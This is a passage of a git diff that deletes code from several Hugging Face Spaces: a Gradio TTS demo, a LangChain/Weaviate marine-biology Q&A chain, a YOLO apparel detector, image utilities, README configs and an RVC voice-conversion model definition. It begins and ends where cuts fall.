length_scale=1)[0][0,0].data.cpu().float().numpy() - sampling_rate = 22050 - return (sampling_rate, audio) - -app = gr.Blocks() - -with app: - with gr.Tabs(): - - with gr.TabItem("Basic"): - - tts_input1 = gr.TextArea(label="输入你想跟剑魔说的话", value="我是暮光星灵佐伊,我要三天之内杀了你") - tts_input3 = gr.TextArea(label="写上你给他的设定", value="你叫亚托克斯,俗称剑魔,世界的终结者。") - tts_submit = gr.Button("Generate", variant="primary") - tts_output2 = gr.Audio(label="Output") - tts_submit.click(infer, [tts_input1,tts_input3], [tts_output2]) - app.launch() \ No newline at end of file diff --git a/spaces/EmbeddedAndrew/examin8/chain.py b/spaces/EmbeddedAndrew/examin8/chain.py deleted file mode 100644 index 898b9fbd59bfc07e5f1f66531118d2eaf01fe328..0000000000000000000000000000000000000000 --- a/spaces/EmbeddedAndrew/examin8/chain.py +++ /dev/null @@ -1,127 +0,0 @@ -import json -import os -import pathlib -from typing import Dict, List, Tuple - -import weaviate -from langchain import OpenAI, PromptTemplate -from langchain.chains import LLMChain -from langchain.chains.base import Chain -from langchain.chains.combine_documents.base import BaseCombineDocumentsChain -from langchain.chains.conversation.memory import ConversationBufferMemory -from langchain.chains.question_answering import load_qa_chain -from langchain.embeddings import OpenAIEmbeddings -from langchain.prompts import FewShotPromptTemplate, PromptTemplate -from langchain.prompts.example_selector import \ - SemanticSimilarityExampleSelector -from langchain.vectorstores import FAISS, Weaviate -from pydantic import BaseModel - - -class CustomChain(Chain, BaseModel): - - vstore: Weaviate - chain: BaseCombineDocumentsChain - key_word_extractor: Chain - - @property - def input_keys(self) -> List[str]: - return ["question"] - - @property - def output_keys(self) -> List[str]: - return ["answer"] - - def _call(self, inputs: Dict[str, str]) -> Dict[str, str]: - question = inputs["question"] - chat_history_str = _get_chat_history(inputs["chat_history"]) - if chat_history_str: - new_question = self.key_word_extractor.run( - question=question, chat_history=chat_history_str - ) - else: - new_question = question - print(new_question) - docs = self.vstore.similarity_search(new_question, k=4) - new_inputs = inputs.copy() - new_inputs["question"] = new_question - new_inputs["chat_history"] = chat_history_str - answer, _ = self.chain.combine_docs(docs, **new_inputs) - return {"answer": answer} - - -def get_new_chain1(vectorstore) -> Chain: - WEAVIATE_URL = os.environ["WEAVIATE_URL"] - client = weaviate.Client( - url=WEAVIATE_URL, - additional_headers={"X-OpenAI-Api-Key": os.environ["OPENAI_API_KEY"]}, - ) - - _eg_template = """## Example: - - Chat History: - {chat_history} - Follow Up Input: {question} - Standalone question: {answer}""" - _eg_prompt = PromptTemplate( - template=_eg_template, - input_variables=["chat_history", "question", "answer"], - ) - - _prefix = """Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question. You should assume that the question is related to marine biology.""" - _suffix = """## Example: - - Chat History: - {chat_history} - Follow Up Input: {question} - Standalone question:""" - eg_store = Weaviate( - client, - "Rephrase", - "content", - attributes=["question", "answer", "chat_history"], - ) - example_selector = SemanticSimilarityExampleSelector(vectorstore=eg_store, k=4) - prompt = FewShotPromptTemplate( - prefix=_prefix, - suffix=_suffix, - example_selector=example_selector, - example_prompt=_eg_prompt, - input_variables=["question", "chat_history"], - ) - llm = OpenAI(temperature=0, model_name="text-davinci-003") - key_word_extractor = LLMChain(llm=llm, prompt=prompt) - - EXAMPLE_PROMPT = PromptTemplate( - template=">Example:\nContent:\n---------\n{page_content}\n----------\nSource: {source}", - input_variables=["page_content", "source"], - ) - template = """You are an AI assistant for Wikipedia information about marine biology. -You are given the following extracted parts of a long document and a question. Provide a conversational answer with a hyperlink to the wikipedia page. -You should only use hyperlinks that are explicitly listed as a source in the context. Do NOT make up a hyperlink that is not listed. -If you don't know the answer, just say "Hmm, I'm not sure." Don't try to make up an answer. -If the question is not about marine biology, the oceans, or biology, politely inform them that you are tuned to only answer questions about marine biology. -Question: {question} -========= -{context} -========= -Answer in Markdown:""" - PROMPT = PromptTemplate(template=template, input_variables=["question", "context"]) - doc_chain = load_qa_chain( - OpenAI(temperature=0, model_name="text-davinci-003", max_tokens=-1), - chain_type="stuff", - prompt=PROMPT, - document_prompt=EXAMPLE_PROMPT, - ) - return CustomChain( - chain=doc_chain, vstore=vectorstore, key_word_extractor=key_word_extractor - ) - - -def _get_chat_history(chat_history: List[Tuple[str, str]]): - buffer = "" - for human_s, ai_s in chat_history: - human = f"Human: " + human_s - ai = f"Assistant: " + ai_s - buffer += "\n" + "\n".join([human, ai]) - return buffer diff --git a/spaces/EuroPython2022/Warehouse_Apparel_Detection/metadata/predictor_yolo_detector/detector_test.py b/spaces/EuroPython2022/Warehouse_Apparel_Detection/metadata/predictor_yolo_detector/detector_test.py deleted file mode 100644 index f728dcfe392de07aaa3b9e7b28b734142b15423b..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/Warehouse_Apparel_Detection/metadata/predictor_yolo_detector/detector_test.py +++ /dev/null @@ -1,176 +0,0 @@ -import os -import shutil -import time -from pathlib import Path - -import cv2 -import torch -import torch.backends.cudnn as cudnn -from numpy import random -from PIL import Image - -from metadata.utils.utils import encodeImageIntoBase64 - -import sys -sys.path.insert(0, 'metadata/predictor_yolo_detector') - -from metadata.predictor_yolo_detector.models.experimental import attempt_load -from metadata.predictor_yolo_detector.utils.datasets import LoadStreams, LoadImages -from metadata.predictor_yolo_detector.utils.general import ( - check_img_size, non_max_suppression, apply_classifier, scale_coords, - xyxy2xywh, plot_one_box, strip_optimizer, set_logging) -from metadata.predictor_yolo_detector.utils.torch_utils import select_device, load_classifier, \ - time_synchronized - - -class Detector(): - def __init__(self, filename): - self.weights = "./metadata/predictor_yolo_detector/best.pt" - self.conf = float(0.5) - self.source = "./metadata/predictor_yolo_detector/inference/images/" - self.img_size = int(416) - self.save_dir = "./metadata/predictor_yolo_detector/inference/output" - self.view_img = False - self.save_txt = False - self.device = 'cpu' - self.augment = True - self.agnostic_nms = True - self.conf_thres = float(0.5) - self.iou_thres = float(0.45) - self.classes = 0 - self.save_conf = True - self.update = True - self.filename = filename - - def detect(self, save_img=False): - out, source, weights, view_img, save_txt, imgsz = \ - self.save_dir, self.source, self.weights, self.view_img, self.save_txt, self.img_size - webcam = source.isnumeric() or source.startswith(('rtsp://', 'rtmp://', 'http://')) or source.endswith('.txt') - - # Initialize - set_logging() - device = select_device(self.device) - if os.path.exists(out): # output dir - shutil.rmtree(out) # delete dir - os.makedirs(out) # make new dir - half = device.type != 'cpu' # half precision only supported on CUDA - - # Load model - model = attempt_load(weights, map_location=device) # load FP32 model - imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size - if half: - model.half() # to FP16 - - # Second-stage classifier - classify = False - if classify: - modelc = load_classifier(name='resnet101', n=2) # initialize - modelc.load_state_dict(torch.load('weights/resnet101.pt', map_location=device)['model']) # load weights - modelc.to(device).eval() - - # Set Dataloader - vid_path, vid_writer = None, None - if webcam: - view_img = True - cudnn.benchmark = True # set True to speed up constant image size inference - dataset = LoadStreams(source, img_size=imgsz) - else: - save_img = True - dataset = LoadImages(source, img_size=imgsz) - - # Get names and colors - names = model.module.names if hasattr(model, 'module') else model.names - colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))] - - # Run inference - t0 = time.time() - img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img - _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once - for path, img, im0s, vid_cap in dataset: - img = torch.from_numpy(img).to(device) - img = img.half() if half else img.float() # uint8 to fp16/32 - img /= 255.0 # 0 - 255 to 0.0 - 1.0 - if img.ndimension() == 3: - img = img.unsqueeze(0) - - # Inference - t1 = time_synchronized() - pred = model(img, augment=self.augment)[0] - - # Apply NMS - pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, - agnostic=self.agnostic_nms) - t2 = time_synchronized() - - # Apply Classifier - if classify: - pred = apply_classifier(pred, modelc, img, im0s) - - # Process detections - for i, det in enumerate(pred): # detections per image - if webcam: # batch_size >= 1 - p, s, im0 = path[i], '%g: ' % i, im0s[i].copy() - else: - p, s, im0 = path, '', im0s - - save_path = str(Path(out) / Path(p).name) - txt_path = str(Path(out) / Path(p).stem) + ('_%g' % dataset.frame if dataset.mode == 'video' else '') - s += '%gx%g ' % img.shape[2:] # print string - gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh - if det is not None and len(det): - # Rescale boxes from img_size to im0 size - det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round() - - # Print results - for c in det[:, -1].unique(): - n = (det[:, -1] == c).sum() # detections per class - s += '%g %ss, ' % (n, names[int(c)]) # add to string - - # Write results - for *xyxy, conf, cls in reversed(det): - if save_txt: # Write to file - xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh - line = (cls, conf, *xywh) if self.save_conf else (cls, *xywh) # label format - with open(txt_path + '.txt', 'a') as f: - f.write(('%g ' * len(line) + '\n') % line) - - if save_img or view_img: # Add bbox to image - label = '%s %.2f' % (names[int(cls)], conf) - plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3) - - # Print time (inference + NMS) - # print('%sDone. (%.3fs)' % (s, t2 - t1)) - # detections = "Total No. of Cardboards:" + str(len(det)) - # cv2.putText(img = im0, text = detections, org = (round(im0.shape[0]*0.08), round(im0.shape[1]*0.08)),fontFace = cv2.FONT_HERSHEY_DUPLEX, fontScale = 1.0,color = (0, 0, 255),thickness = 3) - im0 = cv2.cvtColor(im0, cv2.COLOR_RGB2BGR) - return im0 - # if save_img: - # if dataset.mode == 'images': - - # #im = im0[:, :, ::-1] - # im = Image.fromarray(im0) - - # im.save("output.jpg") - # # cv2.imwrite(save_path, im0) - # else: - # print("Video Processing Needed") - - - # if save_txt or save_img: - # print('Results saved to %s' % Path(out)) - - # print('Done. (%.3fs)' % (time.time() - t0)) - - # return "Done" - - def detect_action(self): - with torch.no_grad(): - img = self.detect() - return img - # bgr_image = cv2.imread("output.jpg") - # im_rgb = cv2.cvtColor(bgr_image, cv2.COLOR_RGB2BGR) - # cv2.imwrite('color_img.jpg', im_rgb) - # opencodedbase64 = encodeImageIntoBase64("color_img.jpg") - # result = {"image": opencodedbase64.decode('utf-8')} - # return result - diff --git a/spaces/EuroPython2022/batangkali/README.md b/spaces/EuroPython2022/batangkali/README.md deleted file mode 100644 index 25f2fa6c6e8e0afc76403f5486d90ba0494f1dec..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/batangkali/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Batangkali -emoji: ⚡ -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.0.26 -app_file: app.py -pinned: false -license: gpl-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/EuroPython2022/illustrated-lyrics-generator/utils.py b/spaces/EuroPython2022/illustrated-lyrics-generator/utils.py deleted file mode 100644 index 481397d52b50c1a2a80d3b66b8438a8058d52ff9..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/illustrated-lyrics-generator/utils.py +++ /dev/null @@ -1,77 +0,0 @@ -# Source: https://huggingface.co/huggan/fastgan-few-shot-fauvism-still-life -import torch -import torch.nn as nn -from enum import Enum - -import base64 -import json -from io import BytesIO -from PIL import Image -import requests -import re - -class ImageType(Enum): - REAL_UP_L = 0 - REAL_UP_R = 1 - REAL_DOWN_R = 2 - REAL_DOWN_L = 3 - FAKE = 4 - - -def crop_image_part(image: torch.Tensor, - part: ImageType) -> torch.Tensor: - size = image.shape[2] // 2 - - if part == ImageType.REAL_UP_L: - return image[:, :, :size, :size] - - elif part == ImageType.REAL_UP_R: - return image[:, :, :size, size:] - - elif part == ImageType.REAL_DOWN_L: - return image[:, :, size:, :size] - - elif part == ImageType.REAL_DOWN_R: - return image[:, :, size:, size:] - - else: - raise ValueError('invalid part') - - -def init_weights(module: nn.Module): - if isinstance(module, nn.Conv2d): - torch.nn.init.normal_(module.weight, 0.0, 0.02) - - if isinstance(module, nn.BatchNorm2d): - torch.nn.init.normal_(module.weight, 1.0, 0.02) - module.bias.data.fill_(0) - -def load_image_from_local(image_path, image_resize=None): - image = Image.open(image_path) - - if isinstance(image_resize, tuple): - image = image.resize(image_resize) - return image - -def load_image_from_url(image_url, rgba_mode=False, image_resize=None, default_image=None): - try: - image = Image.open(requests.get(image_url, stream=True).raw) - - if rgba_mode: - image = image.convert("RGBA") - - if isinstance(image_resize, tuple): - image = image.resize(image_resize) - - except Exception as e: - image = None - if default_image: - image = load_image_from_local(default_image, image_resize=image_resize) - - return image - -def image_to_base64(image_array): - buffered = BytesIO() - image_array.save(buffered, format="PNG") - image_b64 = base64.b64encode(buffered.getvalue()).decode("utf-8") - return f"data:image/png;base64, {image_b64}" diff --git a/spaces/FaceOnLive/Face-Liveness-Detection-SDK/README.md b/spaces/FaceOnLive/Face-Liveness-Detection-SDK/README.md deleted file mode 100644 index 78d31828c757fb7a6b020abc26b3464b51853f81..0000000000000000000000000000000000000000 --- a/spaces/FaceOnLive/Face-Liveness-Detection-SDK/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Face Liveness Detection SDK -emoji: 😻 -colorFrom: yellow -colorTo: purple -sdk: docker -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/models_onnx.py b/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/models_onnx.py deleted file mode 100644 index 963e67b29f828e9fdd096397952054fe77cf3d10..0000000000000000000000000000000000000000 --- a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/models_onnx.py +++ /dev/null @@ -1,819 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from lib.infer_pack import modules -from lib.infer_pack import attentions -from lib.infer_pack import commons -from lib.infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from lib.infer_pack.commons import init_weights -import numpy as np -from lib.infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMsNSFsidM(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - version, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - if version == "v1": - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - else: - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - self.speaker_map = None - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def construct_spkmixmap(self, n_speaker): - self.speaker_map = 